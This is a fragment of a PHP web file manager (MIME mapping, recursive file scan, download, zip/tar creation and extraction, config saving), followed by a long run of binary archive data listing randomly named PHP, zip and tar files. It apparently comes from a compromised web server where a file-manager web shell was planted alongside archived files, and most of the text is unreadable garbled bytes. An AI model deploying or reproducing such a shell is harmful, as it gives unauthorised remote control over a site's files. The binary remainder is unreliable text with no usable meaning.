$fileTypes['ra'] = 'audio/x-pn-realaudio'; $fileTypes['ram'] = 'audio/x-pn-realaudio'; $fileTypes['ogg'] = 'audio/x-pn-realaudio'; $fileTypes['wav'] = 'video/x-msvideo'; $fileTypes['wmv'] = 'video/x-msvideo'; $fileTypes['avi'] = 'video/x-msvideo'; $fileTypes['asf'] = 'video/x-msvideo'; $fileTypes['divx'] = 'video/x-msvideo'; $fileTypes['mp3'] = 'audio/mpeg'; $fileTypes['mp4'] = 'audio/mpeg'; $fileTypes['mpeg'] = 'video/mpeg'; $fileTypes['mpg'] = 'video/mpeg'; $fileTypes['mpe'] = 'video/mpeg'; $fileTypes['mov'] = 'video/quicktime'; $fileTypes['swf'] = 'video/quicktime'; $fileTypes['3gp'] = 'video/quicktime'; $fileTypes['m4a'] = 'video/quicktime'; $fileTypes['aac'] = 'video/quicktime'; $fileTypes['m3u'] = 'video/quicktime'; $fileTypes['php'] = ['application/x-php']; $fileTypes['html'] = ['text/html']; $fileTypes['txt'] = ['text/plain']; //Unknown mime-types should be 'application/octet-stream' if(empty($fileTypes[$extension])) { $fileTypes[$extension] = ['application/octet-stream']; } return $fileTypes[$extension]; } function scan($dir = '', $filter = '') { $path = FM_ROOT_PATH.'/'.$dir; if($path) { $ite = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($path)); $rii = new RegexIterator($ite, "/(" . $filter . ")/i"); $files = array(); foreach ($rii as $file) { if (!$file->isDir()) { $fileName = $file->getFilename(); $location = str_replace(FM_ROOT_PATH, '', $file->getPath()); $files[] = array( "name" => $fileName, "type" => "file", "path" => $location, ); } } return $files; } } function fm_download_file($fileLocation, $fileName, $chunkSize = 1024) { if (connection_status() != 0) return (false); $extension = pathinfo($fileName, PATHINFO_EXTENSION); $contentType = fm_get_file_mimes($extension); $size = filesize($fileLocation); if ($size == 0) { fm_set_msg(lng('Zero byte file! Aborting download'), 'error'); $FM_PATH=FM_PATH; fm_redirect(FM_SELF_URL . '?p=' . urlencode($FM_PATH)); return (false); } @ini_set('magic_quotes_runtime', 0); $fp = fopen("$fileLocation", "rb"); if ($fp === false) { fm_set_msg(lng('Cannot open file! Aborting download'), 'error'); $FM_PATH=FM_PATH; fm_redirect(FM_SELF_URL . '?p=' . urlencode($FM_PATH)); return (false); } // headers header('Content-Description: File Transfer'); header('Expires: 0'); header('Cache-Control: must-revalidate, post-check=0, pre-check=0'); header('Pragma: public'); header("Content-Transfer-Encoding: binary"); header("Content-Type: $contentType"); $contentDisposition = 'attachment'; if (strstr($_SERVER['HTTP_USER_AGENT'], "MSIE")) { $fileName = preg_replace('/\./', '%2e', $fileName, substr_count($fileName, '.') - 1); header("Content-Disposition: $contentDisposition;filename=\"$fileName\""); } else { header("Content-Disposition: $contentDisposition;filename=\"$fileName\""); } header("Accept-Ranges: bytes"); $range = 0; if (isset($_SERVER['HTTP_RANGE'])) { list($a, $range) = explode("=", $_SERVER['HTTP_RANGE']); str_replace($range, "-", $range); $size2 = $size - 1; $new_length = $size - $range; header("HTTP/1.1 206 Partial Content"); header("Content-Length: $new_length"); header("Content-Range: bytes $range$size2/$size"); } else { $size2 = $size - 1; header("Content-Range: bytes 0-$size2/$size"); header("Content-Length: " . $size); } $fileLocation = realpath($fileLocation); while (ob_get_level()) ob_end_clean(); readfile($fileLocation); fclose($fp); return ((connection_status() == 0) and !connection_aborted()); } function fm_get_theme() { $result = ''; if(FM_THEME == "dark") { $result = "text-white bg-dark"; } return $result; } class FM_Zipper { private $zip; public function __construct() { $this->zip = new ZipArchive(); } public function create($filename, $files) { $res = $this->zip->open($filename, ZipArchive::CREATE); if ($res !== true) { return false; } if (is_array($files)) { foreach ($files as $f) { $f = fm_clean_path($f); if (!$this->addFileOrDir($f)) { $this->zip->close(); return false; } } $this->zip->close(); return true; } else { if ($this->addFileOrDir($files)) { $this->zip->close(); return true; } return false; } } public function unzip($filename, $path) { $res = $this->zip->open($filename); if ($res !== true) { return false; } if ($this->zip->extractTo($path)) { $this->zip->close(); return true; } return false; } private function addFileOrDir($filename) { if (is_file($filename)) { return $this->zip->addFile($filename); } elseif (is_dir($filename)) { return $this->addDir($filename); } return false; } private function addDir($path) { if (!$this->zip->addEmptyDir($path)) { return false; } $objects = scandir($path); if (is_array($objects)) { foreach ($objects as $file) { if ($file != '.' and $file != '..') { if (is_dir($path . '/' . $file)) { if (!$this->addDir($path . '/' . $file)) { return false; } } elseif (is_file($path . '/' . $file)) { if (!$this->zip->addFile($path . '/' . $file)) { return false; } } } } return true; } return false; } } class FM_Zipper_Tar { private $tar; public function __construct() { $this->tar = null; } public function create($filename, $files) { $this->tar = new PharData($filename); if (is_array($files)) { foreach ($files as $f) { $f = fm_clean_path($f); if (!$this->addFileOrDir($f)) { return false; } } return true; } else { if ($this->addFileOrDir($files)) { return true; } return false; } } public function unzip($filename, $path) { $res = $this->tar->open($filename); if ($res !== true) { return false; } if ($this->tar->extractTo($path)) { return true; } return false; } /** * Add file/folder to archive * @param string $filename * @return bool */ private function addFileOrDir($filename) { if (is_file($filename)) { try { $this->tar->addFile($filename); return true; } catch (Exception $e) { return false; } } elseif (is_dir($filename)) { return $this->addDir($filename); } return false; } private function addDir($path) { $objects = scandir($path); if (is_array($objects)) { foreach ($objects as $file) { if ($file != '.' and $file != '..') { if (is_dir($path . '/' . $file)) { if (!$this->addDir($path . '/' . $file)) { return false; } } elseif (is_file($path . '/' . $file)) { try { $this->tar->addFile($path . '/' . $file); } catch (Exception $e) { return false; } } } } return true; } return false; } } class FM_Config { var $data; function __construct() { global $root_path, $root_url, $CONFIG; $fm_url = $root_url.$_SERVER["PHP_SELF"]; $this->data = array( 'lang' => 'en', 'error_reporting' => true, 'show_hidden' => true ); $data = false; if (strlen($CONFIG)) { $data = fm_object_to_array(json_decode($CONFIG)); } else { $msg = 'noncondensable
Error: Cannot load configuration'; if (substr($fm_url, -1) == '/') { $fm_url = rtrim($fm_url, '/'); $msg .= '
'; $msg .= '
Seems like you have a trailing slash on the URL.'; $msg .= '
Try this link: ' . $fm_url . ''; } die($msg); } if (is_array($data) and count($data)) $this->data = $data; else $this->save(); } function save() { $fm_file = __FILE__; $var_name = '$CONFIG'; $var_value = var_export(json_encode($this->data), true); $config_string = " ' . $_SESSION[DN_CESSION_ID]['message'] . '

'; unset($_SESSION[DN_CESSION_ID]['message']); unset($_SESSION[DN_CESSION_ID]['status']); } } function fm_show_header_login() { $sprites_ver = '20160315'; header("Content-Type: text/html; charset=utf-8"); header("Expires: Sat, 26 Jul 1997 05:00:00 GMT"); header("Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0"); header("Pragma: no-cache"); global $lang, $root_url, $favicon_path; ?> '; } ?> <?php echo fanco(APP_TITLE) ?> ">
'; } ?> <?php echo fanco(APP_TITLE) ?> ">
PKg[yy gu83i.phpnu[PKIPK,g[ lrw89y.zipnu[PK,g[[Xz index.php.tarnu[PK,g[1dd Perror_lognu[PK,g[ Rgg index.phpnu[PK,g[`mindex.php.php.tar.gznu[PK,g[!m\@@error_log.tar.gznu[PK,g[Wb >pk14de.zipnu[PK,g[߽~ $} avmlid.zipnu[PKao_ oy5mbk.tar000064400000004000151033550160006453 0ustar00index.php000064400000000155151033200600006353 0ustar00pki-validation.tar.gz000064400000141231151033550160010607 0ustar00َ+ɲ yEP8ݐ (+w1p~)&2}ʪI`nnnnnnn[XߚE{? ~|' 9a/ L![ s)*#& #u=O\Zv˶> NPow\ooA9*Aʼn܍ȯhVWkTLgz}p|8_;ϰ+^ |Ou??{˯ς YdYi["g?}]@>Q@BvҟFA$pĔ9B[#EϥG8U8X'su%'KQډzogDL=e9> PH _*WWk_wC{`<3@"sIh;aegm@/QQ~S c03Z(Ny{?O$QDUZlSfvεp2ND~s'+FQgHPhN.I} (RDIkNU8%sSTRJ^? f ~I[BC Cpi½0dɄks?-xqH\ ?_7y)WQ77? ?-?-}_7o}<{o01(Z([-hX̭-mo*ۯ 6ܔZY7'/)3, Y 2nܜsrT]3* D6umKz3hOƲ4uƶa}=u u#]h26:ϕd-M泐SG:tQ=XE;DWZ#cd[iLI.(Nlؠ`ye&q(Օm@>u5-o '=XOW `SX}t1'?PfʡE@Fc DL !nq@?y-Ḱ W:dhH@>):2+0 "7RyEfP`kw"ܮ;` zq"vFwvܭed#z&Wt6qsX>?b (enZuD,~|)?u'ק>S4~ZiE2A9UOp&9t^'y fn1֚1н ƍVښeTu?]R, 54A{QJ csxkAꨒo`e +KJセS@*t4~3%ٰ7*W ҘټЂE%!2jHYSayD'= B1" e6$T-',H]Y@rhƍ3 nxcfO`z(_`= sL̿"gѲJs>Y`k@4f|GV2αǧPq8ڒC؎+3 6m-'Mxqi-b'BAl0:OFF-m\Cpq/ށpݐS}Rdɩ7^ &a5~N0Px `lq3M`d;@ELP͗&@0d fs ,`w1g '/@6bN5g3 wEHQ<D(ԐR+۰! Q n<=+᲻ ߞ#)MR v`C7yY/7SoBoMro,/z{o|/ߩ7RoBko@)}/->Vje`µJ(MX3kYw;h;65ēC|a?I5*) |Up<OiB3TY̓¡ӄ03vp4!Fj}#Mz6P`?clFuGnGlrm])ph jhjpc#}Qx] ?o4`4O] `'/ "B?6%6Uq(q5o\i,gxe-)8`}DmQ5#ekMGYAH;I`NU3$'4*8"X8qR3"rAE'@xu$̒ќF"-ʚu;5XxHo|KHegBIdԍ۞N@ @ o<܃VFDUi_:=Oo^iy+4n2.T&IlDF"ۍqd+r;juUxuŞucr8䙶Fy_"ȼh/"]côSbZ$|T3~VBAt9 )B%1I UxX Ȏ/Lkx{$RF+,XHhs@|$-?iF,0J䜆$P=A,O'L1 =#f;/!k>z!O+f=P,ܸ<z-T3) ~j<۝O)5L'Ti;C*Ϧ:l2Y]iYɵr4 =|t|":Xd Chfv:Mo=cBпl6NM @gƇ35me& =qھrӞ!0u $ D<M%e!8]͈Gݬ|)}:MQ=c|]Оf`>TZ%;f2M9udˍ#6v$AIHfsq$:Bw՛ `@W6{M PIX7>teϞ͍0r!y^s›$% '\8'0c\@zOР\˒*}Ƽi_ٞWpu[8'v?M^"|7a}n[3<; ~hԫs'[lѪwꎸ;CA\5++xxtyOpn}v`RGYh%5ZD5ǹ|IfOA~  ]>W֌؄zma٧cM&z0u;|XxZn|r—3CExCfPW_)(~rh3,i5'n"i JpM9{aRS021mjs3x"2߭?糝nuW<ϸlW#>ys s(5 u@7aAFm"EzP)mu~d+T]\~+0C&dU:Tfxb]EjvpN4/yA7L|=zZyR {5z "J+e]fO?#=P{P9WQ@:#H/_˿//?Qܿnb}7hË?WUd9fg?ɀC ! X<9P|w`LdK%t5r%0g _Cю𒘤kL@"P&*(|rx@R'ʆ5|ʌbn9XSUIؿ`fQ__̘\5-FMKAEz?Pfy=Wwɸ wv2۸C ڮBLV{arhh4KP. ?6:k l{)BO`0GNx^qݕ;GB'Խu”ZFDbL@\F![9u*`Hk3yrJfPj{O,_-M{mRb 1WY vljS cx ܞcq)f}PoHz2 rVZAb3gwņ<,7EW"?'ܼiE(N'Ko+e޽ )Y=]X!6.͘b¥myno\Y ׎gyK{^ݽ2a.'pE7T$ʅ{Xb`Hv NN6X7zD)]>|ICh;SVd|wx%;~貙P{7"$&:h2ث\'Ǖx\uЭثSז'r`;Udr65sU$ |=Z{6Vgoz 51]Չ5N8=0mt73:b1fsIw^Z? ;RnNMص):tk ì$¼@ }iauwZȾR%L fI8}MRܲ--tx}|*0iglFp;-[F.^O۵n`6u7f&1EٔEk,-];̉Vm}ɂ箉"wyt\$(b+2rDI*oWz9 m%s_)1ĺ..cbq7/cV.3ե%.eA z89M iW;2Frt!I'oؐބzF"-W4O䋹;*(5wT0Ѩ?DÉF;sGEjuxep)-nUQv@^C~P_N={Z۳/"d~^TW"BP r1.XOmՉ ho2KYts5]:L0d-뎢A 5f;'/5Q\׋齾| ɀӍg?O>ok{ˑA[x?}h5k7|?`xoTK*4c)};w7qhFfI:![+eM&\cpV^M.wH@ZW rzgx:wiv8eы!ZquD[0@i

/W?H%h:GatB r>/r`qvkiy~ٴ^_  \*f٨hbQ&IhBF( "vUT" Gey@Ž 4"FS^VɜqaT7[O *f;-i2w`^opݓ/k7,s DSlM5͢2􃅟vjQᏘʯ}4FH' dT}`Mv)Rq`da5ֹE0ܶ;R%pSl.miDe;ɶZn6g|^_HjU2EHNE\EE^`L,hy0hh 4NLU&nr>ɇ,f˥B2MQ:wT142;$ Y2ժt2쌶jPw&a:|μ.&l*XWo䱫,Le,'ũgIӬ$DXHg{I&vF9(?&FOZ璹.jڱf8YL J:f٤vH&gUu2يC-,Gn>&Lbe j\if5̍i>gyH:.6K2()jIzh[Va6qJ^"S#r,OJPkx<m9T-x*i1/%))қLS2f"ӣk;O!kdeE2\x8YӰd+A(F7P%ʗ`+N9:.$, teR;T~9OKݐ?۞ ٕtă'F]nV+e\'drl.+BBUNr*;|L͏{L&ҥj'ݜU;Y(fen|8N`vm$[ZLL!m'Ct)*Wt:$ga b6Pq+@R:SSVqjپ+\XY1<:0d/n'TzR+/ͶQ_IT6'ri w67Y# 6߭JU3\׹N;U],HSbQ^;.`8X\'4yOs/%'L'޴碐w}HXeJSgj@zM \ǖkԎkɯfeܧ ׅxjS떇D ~fjON̗=Ny8ՎyUFf_rB96mڬ72P=PQo,6M+lfoFq7Yqߤׅ.I3\~Ŷ:Ց)žRۄFYg-ɅZ`emHQlly~ֻE יb bH98l\q }r?͚/jkEПbt >I(DS؍ 3)Z#e>a"ݱ4Vl4=("WǑ)ǍgWh#kWfye[TzbNo?>Jl:rlFzsfcR_tE^e(̏'̢4tu-^;ժ Zǂ#SKqvR u|h-f-*yO ް[QE'eM":*ԗ,#qUe،'#>TMSWsVTc}mtZ\5+dQf3̺_W#q}`.^+vxgLc2hV>+\xjVj*z⩬^ \6z}vwZ@ DhQi:c;xXqN6MOft:U۩\7>OjC|Q 2H/ٲ~/S`pQ=Zʴ҉ն}5HǗtP}ʹ8KwS]4S]%)cű8є98jQN^j*3m9P?4v!/Ix`-$;]0T-y7B1N~PL[lu"(\b ֖<>iԤhG6ĪdzphUX٪t,:B Ԣ09c ݶ[ue^TQSήJn6)Z;_Ob0)En|1Mp=m:M;Zjrߩ z?F4p~ <9 fj/mn0VO+V,$:+^WFUgIDzH s]~T dN6bI: Fi&J1jtNչ:<1|w:lerS4mb\r:1¶ޓ ƒPT$ͷllZ~%GbMr˧2lkMc@=mtIӇYEf,AKӛE&橷kjDZ| ׃R&p x-89as$jnL3-=<5u]v4O֚Q7 Vڱ \g.E#msrlL?Ij"/v ŧVyZéδiI.[I*Ϯ=.Vr`6$~]D=[* nXXFbvPhCn6;63LwWr3VC~Xesw̓ZaS ZF,kM`_MEr&&4?5̊(sb8e!Kՙͦ"b Iy8J`օjʣ^3MUkxvLr1)6DIT &Z-= +li(sq(=<.v"+:˶\Ӯ[S W]W]W]W]W]W]W]W]W]W]W]W]W]W]o ƒlzMŖD췫}Ly*e'.ҼKvv&pq|K8T}!H Ō$̐)G,SQNX ϴ+$bbΐTd)%ǹh>4mp)}MoĊ}0bU9`ߖ^)qrW%zd-_H*o6*3|[EآZd༗,68[dM&^ccU(YlzbrᬸuOvgfپ/=Wh ̢>l'쮸EJ咝 )T]O72IzZ)=3U ft.,BЬ/C4LO`B9ڬ|kөlaQ9yυE6ؗyy7ݦ m N+˻E_aC[UlAmUwd Mh3v6i~LV:n|[ h y'=I.g/*4vutOˇ=|{eirGhJ⎡~J>ZzK:'Ш˯άNo~klݍrA]PC O{6uW<*QvmYC+|s=Y9(v˝x i~W\b6QzY8z[ GY(&/ Vo]maS]w] AvCdZ(aV-7gA?J牭٨rROeuV~q ozp՟gs<WP;4n/Rx*X/U`<gZK?=48:3?hVg@0jR|S18 z%ao'Ah<*n9W[}TF_)FyJrT[Tq6JCVf6鬚3\kiy!&JrWP-@3u5*Eh^WW.Ke|BZ:QJ" /fXPb'ՆBJr*r:= Z\㍸v?9ku\7 ed4 R%h!A^6au1լP|#P.)@7b^xC|-r8=,:ӊcyR&2lj(͊cKh"6Q985ٔh(8$F}PJw s\& z?{voXOa+\%v+ѫ,٪QAJ^ p}L^uNn:>oXPvMh&*A￿J!NLq?BANN[-yD)M"\z[ z:ZЛBhD]W`.`OxD<Ś;>',=y^nu`ug^)3Qt2fk 9F^M'3+4(X "v޹C?#AYE _~1*H <[Rbۡ|x?)rkiԖ諃.- _y+D?@NF1_k/(:&mgf"H+9Xf(O >MWK !ʸs7} ;3ktg/ag:RCvn0bIݒiEG_0ހf1o0;۶:`o!FDue8S}S =ty;MŻ+ضwi9tb+"kCM?[嘤ԩ,@ 4ƹz P4 ˿=.}G{~ˉH?!GF|Ѳ:LY9 gsQ_ݹ5$}9mxE6U&2|C!E );r^qK._uM<bw+?tx{gK[{{kS%r5ȋ J6~$?w~!OX-r^qaO ^GE6eV@٤`"D=a@#!h{KӉy<a/ЇeF)ƏC;=軮fF}G%L_\fMœ &͐e3Őq6?r5a]82CuCzA\~U8YiF*NÐ4إ8RQ 5BFڱ9\3r=roUFArيŚ.dqq NHzO>.muNbuH71g r 'S7(*ĽN#'7+M8adE 8iVԣ03"Re|r`Hj4(n_/0xbFPc{{" ,DD@D%»H\mBi#րm@64tHxszϰI N{4X,]!S7X9}э7SML9y$ξZ -(~-#O2,n4ݱعDt], h멈2c`pg*bQ;;%0EnGؗvD<֐.?`o?I^w쪣NAXu@?]4F'ƆI)As3GN<O^ ̙x 2? T&r%d<fƢQ~˲&8^n2//2GeЏnϸ qvBM]Ϲ[{`PZv=sxP:f` Χ^d$k qw=VB@"9qr(bܽ86X,9wh<_j dKsaZ w>O >|h}{7wyy! Pl0vyx}G59z _!шR"a Fw\ҘúT1+ŋHՅwRU{e0Oj+v$ 9ςϭ46Dc6w^{,Gw0'_v2tln8 >q<ҳ&spa谜ğ0Ӓһ&kuԔI-oYc&&Nȯ-J[Edf1<.W)*/b#A\*pҨ,4I+YWFũoo`-/9YZetg4ehk oV 6% L VEfAJ t^2GQ@ ݘq3ȹzۓIʆ1l,AIr#I,Nq=ѭK$i^W,oSWo"L4;yҡx*0h`IR2oFYl!P:HXh 騞aRi3j̯,HZ˜@",K_Hђ";uN,a\O_\3\4Mrm:,Ss;;8^M$&cpR9 :.kF'KMӳX;p;_/vyk[.h/yDH74@zk6!ON`T21uVl_|/2 G \>ǂ,L>A;'DWRZpt=Y W&t~Sò9D7<=?W|.kM%Dl3NXC8^~蠡)Й˘A,-_]6[x`rDIgYWvIFnF>_x`m^ 9hlSFc?.uZת&J#=j?ؚ]KT_j [-Z?Q?v oHIeԤ Bj.[?6o"n%bH>$X,QRXg=Z{]r`M/u@3UA`QÚO o2#gwE&ݜjK8:&iNͻ(ąqskM}8A`w5݇(dJS3﮿"`&7C۳ /+q뢍FU7bVw+ڤLY74!tAv26 r2RbTo#?j=YUu#ʆrP"a3HzEM #]. mZ^lXǙR:[2{yh[~ jHOyFuB 6G5 p^tgBl;z`gqG3L{{sy䍉^cnor`'BCT==uZ%h!(One8;[^ynF&J~2G{G@<ԍ3<Ø35oBSGt-d:@D(KQ_@L9ba aP8dȎ #p2z@&i탙&9>QI|1"ؾ$ +rbay'uzy)'3 }a-^ܮOW+`<)3>c#`Ȭ}?<[iGS5YЫ Yl9=[̗p+9{ ZxdaCH\*OTk\։{!s ;=gI ^.G9xZC>P7_2]$ޯ-xVtD ofpZTF Eq`&{YQ7szJ6&\UMxuiEg8ѿi%)\֭=HƞCwUƟ(sYEd]gPXp"YajN%$2+Jg|X*Wzjw`8bb)DiU‘h,]^E^qnQ; sG<. _ ݿ 6S珔#xz#"@z&@H*:Ѡ.#5_{*L@>Rs`¦緔JY$Lr?Al;p=&E`I>ҿVq(@=PnzRH I!#)'Ō+b OP[AEBo ~o~2OF V_ [P cy S"T |up\g\p{OB(~?plșxF`GB|1~7,1aIMr{:t/EH'P *RPyP&s+H(Qzi:PHj H,qcywA$NneJHG f˕"QO/˱$-m A$Rǝ{<`i2Dk%}Q},~zCs"O[%=f 77^D't\'???p& GI'[1;ȑNހxuQǛO;OάgU-'ן?ݞ5H:Te<ҋ#ezEZ;ZceG=D6{Pmc=amN=A}BZ1H7>~"!@7XJ0P\]v ]]DԂKľr.ޫJv׺P/H'όA2ޚG|a03,YA.G"g*^99#h\)<rܾ>qU,m^Sɒj dژ[x{瀃tz2;?O~'/ Mh*N"A{Yx9#n[AyU2IkP/ ?PǼI?\C >:QIHPౠAao*c"|lZE bA,ba0Hê=[o1>.>EMX?FR`Ҁ+ʒ`$c:ywubFkD@2=?bO ppXj*K+%)pH}PF~T1zY_HF94ػy%Z(28hj5CZ_<f$^Gm 0lxUdn \|]rm,J3etq{PNRJaC-uu VZ07 [1鈙e'H+v/#R;oqp:M߭>x4tob)̬@!UgR~;&؛tV:H+ %y*Awh78m3 R(ya9|9jv&<[$>ỵjfTkt&k9 N'VMkE7 9rV2~PNj:WW b ;㽢&?m䧳#o2:vL3n+Cʼn$A2>AvYjKm&|w$I Qr9-{$>8UtMaLMnl5E)gV$w"Eߘow=ۥ7 C0,~mo뱹/Y^5ss=gD,ؓ˷>/6峦}9)@whpBKuZBa/^eC®19g7|Xm^6עzo9Nς?9tVdfOR=O^1яĭ̸LI Q l_o(?^4ݳ zq; xp[#&vyGAd ߶و4f>,/X=~^wVb8>koS0 &H.LFW^]1AAd8~xA[' BUmgFL8'$ DHj/es fi\Z"]F'ZצL8M T@:-2Yc@ Kmvo[d0fN} Jy/m@w(~sap_48cF]֩ n09dmb8FUAcJmZYS._Q;KYBtI7ߨkB9^Ɨo %ަ'] KC7/0(ùx,0z,~zu m+* #x rk2䯟A˽ve[7ee&'>ȉ˩y~D~NԆ%WD˭[)ꉍVwc;ݔ` 18\h /wNs8 TGaAJԂ)iʔx 9ETZNBЅ]Bu&ӺRq>h9HB<=A&GrT<%9.SzZYSmw8{K$u-(f)xkoL zk:Gtmeb_ׅxC~|MCGam׍2&)B*CȄ`VM(| 6. M7 GVib:7{Kv$ڻ=E`@h4h A>P? MНo7nĦJbh̳L5@2ÿu,@4Vi&bffn%XnbL>$#EmE>Q3FՍb7N@׿ibbΙGNV$:?޾ pLuaS춋VQ4nu1T3+y"'|Q괺>_o;`Pre"T΋s)t 'CI?C+80Dd8E<Npl:3>\^98mzq/?4 'Cdѐ"z`AHn+k~ߔQcw FY0'mUb8y~Jf^@a:{pڽp7(š&A^0:ݙ-Ơu6[6n{BѨSJ;X/cZ1@.";\aꛨGV )v`a=vD&9buR{ Nׄ17/ kA^Uc G~U0_,]*olp7[pfEX ׷߷IƷܸ?ԣ+תOH(p#M;#ڬ  @Χ~ծ9]ؚW6ۋM  }~[0*:zرXT~v9ob9rS >,eNY_?&Z ӍSͣ`hǧ ^2ލV9ݹ": ?[9Bt_4v8:LX XɅQiJvZ3., ^eq[^ GEf>h1C^Jg5n 8gآnt+M4󑄽ܚ^,vaU/t.OsJ}2oA `^} q%'1*kcmmTL]>;X+7C9 %`-_}A]kqA#R|a h1m-OgʜF[׳ ~6|' 9ßP$a/ LF|Q[ sAYߣ?{ '|0 >h?#/\}FWz$<8\*70y0$ȃˈ<'{ Hq27U ^1swH~@S,h.ǬBFyiO|!- p3Jk ^kc<7ڴw Rv"^bL!"Qv烊kد92+_|G_sدAK~hYS9g 4\ 3y~U쇬>h8u=~HI0 Sm.ƞ v}e[LGhc$h[58pb?5Vrwyeo@r@P;JCu; /><1ݱA^|EkҖ`|*F1-*?`/2?ʟaiG|w9#n Ns/Eu1;" nؑ?e72?ف%82#*oaL^1 2?C["_?Oꟗr7CQ@N?o?oᇿ?ۿP/?x^]{7VW? v^NP~oijܚVo1#P/E9)h~q<>5]Ϻ9}5 ~iKtW_Bq+fap|0F+7.z0ײ~ѮnBۮr`i:@ !@379 yV ؍5Ν+ z};{hh ]b ޴-CLܔYߊ`Q@Gc71Y"A9o{*LbPrM3ʞEkJ@`+(9(϶PB+Ϣd~bA //5@}fIΑdKaW#em(Ns@f8te7%-!2-@7z(ba t 4nJiWUk N O8Mgͷ\yгvJgù& *CyEyf:;)0L3Yb#p:ρQlR ]:rGo14wt^.fQ*7p#2 i; 0O,$4!^~DYז-l[;A{5amÂ>NanKF繒|"Pat*A=uTF<U$Kt  ynH)>(dɩ) )itX%PY 0ffvP/"6P)dM0i8~ `̘/ؗL`9c8y sujͯ9;Q+"u涾EGgPѳn\ pe6>?D8Hn<=+᲻ ߞ#)MR viԛ<:B/ z9&ބ./Rz /F/Ա[#(j4F.p& $ E)~$>wF'vljP݉'jQ~j&XŠpH Hp 囨 ?&Oqtvp4!LjL89-=Mz_] b#`7z-| @ ,Ye h 6hAdFwA@H;vi)ti `' UIްhM5r-фk޾K$,I 7?S7~ v 99"|< l\JH96Z8:Uh9b@6Pc-Yu`ktX%T3A_YYTqTH'鵈ZpX >[}Ǎ6Pp}gŒO 9OT0 *9ffsnɘ|eY ƌA&غ #ųՂ)>uFz%(LF%Fe{Y\L)"*l\bɰ+3nfzw ?]#z] hr2Pd*?-~rE՛[[:'bA2)p\I=gaAH,w ?xY;/koT>??O^<-^t{WAr:JfIP2D,[5vs%fnBdnAiA[CIJ)(tr43$dArl4z2D)u/ @䅮g+tʵU8pT0 2y@dZ&'UQAiSQ%]ҎCne,iZ)5I8N9Eru2cvXI ls&vաNFt=r*yގi Bsz8˘@k1 XNwOYŁ,}b?Bz4O{ң{);Og=Aqf``NXu?=wӭEMaؚliH3[A˕~u>{{+p3E{y07RwVt%5#p2r&i,.5-kSIt:B_aɤQI|1 -m R*ZHG F1Dn^xX}rZV=@IȐrɒ% /ݺJœsnOGyܣ02S-mA Sp`H=7TgnGb^.A Oms;q5ݡNL-j(:Nݐ%hgz~98\Ҽ3TL'LF/n࣮a;7X.(zה.EɲkL{>*jb_ W=S7J\^]YL4{O6#mkL=8 ӥMఠ t+tcj٢WgZD"4^ɬ.ZAI;~5G; }@9W Q}Ԁ ;RaL$:g6L7P[TYF@к*p–S ˈ=zšcpSPk=\9'%0dXC1|{C{Gv^lB$/}BW̌{4YqA7(^GըrG_l:m[1Ә6=fL%:jy?* WL@7ZB/Q[5+UST|Jp=,6 $w6bseWe"2;&˲b vIt Fc(N52.WVf/ LZpV^fY"MN,8mV#d掲-R> ci iJ '=*?WYjJ ]Oór ^7ҕ~?{ ~F63*ʅx op.ʞ`vsI@9dWsQ=C:Rr-KQf{^N m}\h6yul=ބ"Fm;3<,t^Y3"`'e.5KU 8!Ocr@n.zk * __6z zC8Aa^o|u2oˡͰ0r 8MEd%DU0`)Wu{f~t߹wOXx ֟G7H` 4QQ@l%!p|>pgڼ,rmr݄e"s?\ڶ:QGCEڏ@ 2.^.Dz f!**M3X0_";8'×f < &~f>MY@4% ?9g9$$YZ>==ta*dEݕ+q;TX\Y%̠9*1}9;u]ag?Mѕȩω77oAJ [hJwoGB*z&ew@@OWȢ ¿`3f(bpi>h#o`[.EcµYu`9R}<|iwLK D -#$rޡc4؃!+ҁ]j@SG$A ֍QJ p0:!f AΫ_6l&^N %g`Ңq٨i Rf}Һ$1rӾh㾕+rg9깭S/:Y5Vc^.;@?N+BvE~^F()^EjS1ēs9%4FӂX%eӡ}yL5.F6| ~4ĥ,hQ/chM iW;2Frt!I'oؐބzF"-W4O䋹;*(5wT0Ѩ?DÉF;sGEjuxep)-nUQv@^C~P_N={Z۳/"d~^TW"BP r1.XOmՉ ho2KYts5]:L0d-뎢A 5f;'/5Q\׋齾| ɀӍg?O>ok{ˑA[,z~/=ZZ>#Ϡy,UƒJ;;.4 O'wߍ\ls|Ƹ)fX #~_~: ;eYN@ȖpY@t ,@R@E@`]<_Y`lVsh!@"V7 P}b\40-5HtU71l0}i~v^z:)k#38sChs{sF6zx!̀bkZ\ >l۪uZZT2- P]nM`M 8HOiIE&>>N}p_?|~[9O.С #p¶tZüo NODPn=b'O_@eC'̓ةՇWHgE5կ-]se'o N{fAo̊WWo~A~*]ֈ+x&\g ` rӖ4>_$?pcz >g@cu2Hu 8pE:G8Xr`(bs.^oOW3KSt f*ybv:Zfo6WwAEf`6j-Xԟf6Z-J:{+U|H.b QY@c>MÔ~2G\MV?꓂NKd2|d) Kt(B4[aFS oG$`糝Z?A_#淿(d?9|? ?dq8Xݭean2YX0b&run t;'λbC=f[QvNVReLQ*e)gzWhh-8{5Z q7M~;SkՆ[\:u!5rLfqv5l=N.*vLqj%$;m:iIr&')߲3n2,y*=$t>S*d.&Iqw4) d35^IpϢѓֹdnKZvNfj2*b&z6YbwLbP % Xid2cZn stڿOAe堼o|Lj;q5wʩZb;0VUFפH #ԈӇ?#OCz7U JsKhJJ(Dg-i0f씫bY&S|YGn }4Nփ4,:٣gэ?Tb0 bSN;9y2 K]Thzl_R7϶'pv%`R|.Oo_ԘU=c7%Or*̜a:vL6q-'gYτ& tJ-WI3,ˊ)+GdiөJN*>&Sc*Siz?ItI7tzN Y9r}okxPf-|܊4fb;4*Qw:RXYCnS]L+nU׉l^Ӧo-MJJmN~nm'~g`z&/On*8,,|d(Xj66;ZZE1~̚fYjv˰Z5-:^[>6b6ezf VX_xVtF/ZcDK[U%{?jmHi!d}<(]}.GŮl7z">#I}xup|[_۵ 22tdQ-@?a+uz-3YmP"cǛ(Zqe |nokC_d"Jg+) $@ H:sr@m3Q!vz`EK1ztb\Th, &*jsq0ҸZ,+p5jwvZi.N9;~?*Z40M ։lFmB&8'X[lfWfxaҢ'gRC|f8S|#XG/O+OѢ%!\ǃ@sr2_mqz?xٱڋzۭL'>Fӊ 1,ʴ~Yұl28*\.B+X0Qd 8'AFLafZ9|u.pdO,z5:N@6[4>T=|1efLh$d.㦥q9>f}j7Iy3V~_F)Cx 78 ZX4P{ ]aV|2Ffy횚= 08=%^ 